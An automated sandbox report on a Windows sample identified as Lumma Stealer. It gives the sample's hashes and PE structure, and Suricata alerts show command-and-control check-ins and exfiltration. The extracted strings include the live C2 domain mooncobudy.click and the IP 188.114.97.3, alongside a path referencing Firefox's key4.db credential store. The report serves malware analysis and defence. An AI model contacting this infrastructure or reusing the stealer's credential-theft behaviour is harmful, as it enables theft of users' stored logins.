                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://mooncobudy.click:443/apiMBitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4ClZfC2k4pbW4ZbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://mooncobudy.click/BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://mooncobudy.click:443/apiv1np.default-release/key4.dbPKBitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_b07fa4138d6cee96061521c23bb7cd6608bee0c31ef2bfdcBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://x1.c.lencr.org/0BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://x1.i.lencr.org/0BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://mooncobudy.click/4%G##BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              188.114.97.3
                                                                              		mooncobudy.clickEuropean Union
                                                                              		13335CLOUDFLARENETUStrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1585289
                                                                              Start date and time:2025-01-07 13:18:09 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 4m 17s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:6
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:64pOGv7k4N.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:a56fc11692ab8baf7f9e3b80540d63c5.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 91%
                                                                              • Number of executed functions: 24
                                                                              • Number of non-executed functions: 98
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Stop behavior analysis, all processes terminated

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target 64pOGv7k4N.exe, PID 7612 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              07:19:36API Interceptor8x Sleep call for process: BitLockerToGo.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              188.114.97.3DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uzshou.world/ricr/
                                                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cifasnc.info/8rr3/
                                                                              Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cifasnc.info/8rr3/
                                                                              dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                              • /api/get/free
                                                                              dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                              • /api/get/free
                                                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rgenerousrs.store/o362/
                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                              • www.beylikduzu616161.xyz/2nga/
                                                                              Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                              • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                                              • paste.ee/d/lxvbq

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              s-part-0017.t-0009.t-msedge.nethttps://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              mail-41.emlGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 13.107.246.45
                                                                              Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 13.107.246.45
                                                                              https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                              • 13.107.246.45
                                                                              https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousHTMLPhisherBrowse
                                                                              • 13.107.246.45
                                                                              64.exeGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              iy1.dat.exeGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                              • 13.107.246.45
                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              mooncobudy.clickSet-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                              • 188.114.97.3
                                                                              Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.44.57

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSBnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                              • 104.21.48.1
                                                                              https://rebrand.ly/3d446fGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.26.5.15
                                                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.148.216
                                                                              Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.16.123.96
                                                                              https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                              • 172.64.149.23
                                                                              Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 172.64.41.3
                                                                              Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 104.18.186.31
                                                                              https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                              • 104.21.18.171

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                              • 188.114.97.3
                                                                              NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3
                                                                              H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3
                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3
                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.97.3

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              No created / dropped files found

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Entropy (8bit):6.371437153316211
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:64pOGv7k4N.exe
                                                                              File size:3'805'184 bytes
                                                                              MD5:a56fc11692ab8baf7f9e3b80540d63c5
                                                                              SHA1:4ddd8e40b3ca6c4cd0cf4156b5b163074065a79c
                                                                              SHA256:0bcd82ed4ea3e12cbaabc50df612d48078604e4d0985e9a240afc24630afa4d7
                                                                              SHA512:48dad306d5ea8beef592aed1c058028c9e381094ac744e4a83ef417fb3818957892a0e10cee9a9111bfd143bb2a2d8089702307408b61c61cc89d15080a22065
                                                                              SSDEEP:49152:bJ1e+9v2D0/fUjjodrWaQPF7IfxzcewtrzzOlEVp531fv7E6r61nF16FbG:bJ15LU/Qr0rz9fv
                                                                              TLSH:A8063941FADB80B5DA0318302457A2BF57307E095B34CB97FA1C7E5AEB736A20D36619
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........9..............J..........`.........7...@..........................@=......u:...@................................

                                                                              File Icon

                                                                              Icon Hash:92a9ececd2d2ad92

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x45de60
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:1
                                                                              File Version Major:6
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp 00007F2EF4F88A50h
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub esp, 28h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              mov dword ptr [esp+10h], ebp
                                                                              mov dword ptr [esp+14h], esi
                                                                              mov dword ptr [esp+18h], edi
                                                                              mov esi, eax
                                                                              mov edx, dword ptr fs:[00000014h]
                                                                              cmp edx, 00000000h
                                                                              jne 00007F2EF4F8AD59h
                                                                              mov eax, 00000000h
                                                                              jmp 00007F2EF4F8ADB6h
                                                                              mov edx, dword ptr [edx+00000000h]
                                                                              cmp edx, 00000000h
                                                                              jne 00007F2EF4F8AD57h
                                                                              call 00007F2EF4F8AE49h
                                                                              mov dword ptr [esp+20h], edx
                                                                              mov dword ptr [esp+24h], esp
                                                                              mov ebx, dword ptr [edx+18h]
                                                                              mov ebx, dword ptr [ebx]
                                                                              cmp edx, ebx
                                                                              je 00007F2EF4F8AD6Ah
                                                                              mov ebp, dword ptr fs:[00000014h]
                                                                              mov dword ptr [ebp+00000000h], ebx
                                                                              mov edi, dword ptr [ebx+1Ch]
                                                                              sub edi, 28h
                                                                              mov dword ptr [edi+24h], esp
                                                                              mov esp, edi
                                                                              mov ebx, dword ptr [ecx]
                                                                              mov ecx, dword ptr [ecx+04h]
                                                                              mov dword ptr [esp], ebx
                                                                              mov dword ptr [esp+04h], ecx
                                                                              mov dword ptr [esp+08h], edx
                                                                              call esi
                                                                              mov eax, dword ptr [esp+0Ch]
                                                                              mov esp, dword ptr [esp+24h]
                                                                              mov edx, dword ptr [esp+20h]
                                                                              mov ebp, dword ptr fs:[00000014h]
                                                                              mov dword ptr [ebp+00000000h], edx
                                                                              mov edi, dword ptr [esp+18h]
                                                                              mov esi, dword ptr [esp+14h]
                                                                              mov ebp, dword ptr [esp+10h]
                                                                              mov ebx, dword ptr [esp+1Ch]
                                                                              add esp, 28h
                                                                              retn 0004h
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              mov edx, dword ptr [ecx]
                                                                              mov eax, esp

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3bc0000x3dc.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d10000x2387.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3bd0000x12e3c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x3712e00xa0.data
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1b49750x1b4a004b98a93914635cce4faf0bb661387b30False0.40134621922416264data6.03531144567553IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x1b60000x1ba4a80x1ba6006de9448ebe2ae5e8c580170a750962e0False0.4998465756569652data6.074871419086468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x3710000x4a2380x1c200fd8dfcd020de054704e372e76ef7deacFalse0.5106944444444445data5.605165413136394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0x3bc0000x3dc0x4009b972faccfd001450012473f76e2e70eFalse0.4892578125data4.665334753873026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .reloc0x3bd0000x12e3c0x13000682dd942cd1a363c189cad4e930c40c3False0.6317459909539473data6.654383754884241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              .symtab0x3d00000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x3d10000x23870x2400f72006c414cf8622632c6b8157db1f7aFalse0.8364800347222222data7.514554072460553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x3d11300x1b97PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9350134503751947
                                                                              RT_GROUP_ICON0x3d2cc80x14dataEnglishUnited States1.05
                                                                              RT_VERSION0x3d2cdc0x288dataEnglishUnited States0.4799382716049383
                                                                              RT_MANIFEST0x3d2f640x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                              Imports

                                                                              DLLImport
                                                                              kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-07T13:19:35.249464+01002058715ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mooncobudy .click)1192.168.2.3531841.1.1.153UDP
                                                                              2025-01-07T13:19:35.825750+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349913188.114.97.3443TCP
                                                                              2025-01-07T13:19:35.825750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349913188.114.97.3443TCP
                                                                              2025-01-07T13:19:36.324777+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.349913188.114.97.3443TCP
                                                                              2025-01-07T13:19:36.324777+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.349913188.114.97.3443TCP
                                                                              2025-01-07T13:19:37.138527+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349919188.114.97.3443TCP
                                                                              2025-01-07T13:19:37.138527+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349919188.114.97.3443TCP
                                                                              2025-01-07T13:19:37.895782+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.349919188.114.97.3443TCP
                                                                              2025-01-07T13:19:37.895782+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.349919188.114.97.3443TCP
                                                                              2025-01-07T13:19:38.728022+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349930188.114.97.3443TCP
                                                                              2025-01-07T13:19:38.728022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349930188.114.97.3443TCP
                                                                              2025-01-07T13:19:40.827989+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349944188.114.97.3443TCP
                                                                              2025-01-07T13:19:40.827989+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349944188.114.97.3443TCP
                                                                              2025-01-07T13:19:41.479046+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.349944188.114.97.3443TCP
                                                                              2025-01-07T13:19:42.154407+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349951188.114.97.3443TCP
                                                                              2025-01-07T13:19:42.154407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349951188.114.97.3443TCP
                                                                              2025-01-07T13:19:43.789033+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349963188.114.97.3443TCP
                                                                              2025-01-07T13:19:43.789033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349963188.114.97.3443TCP
                                                                              2025-01-07T13:19:45.302126+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349973188.114.97.3443TCP
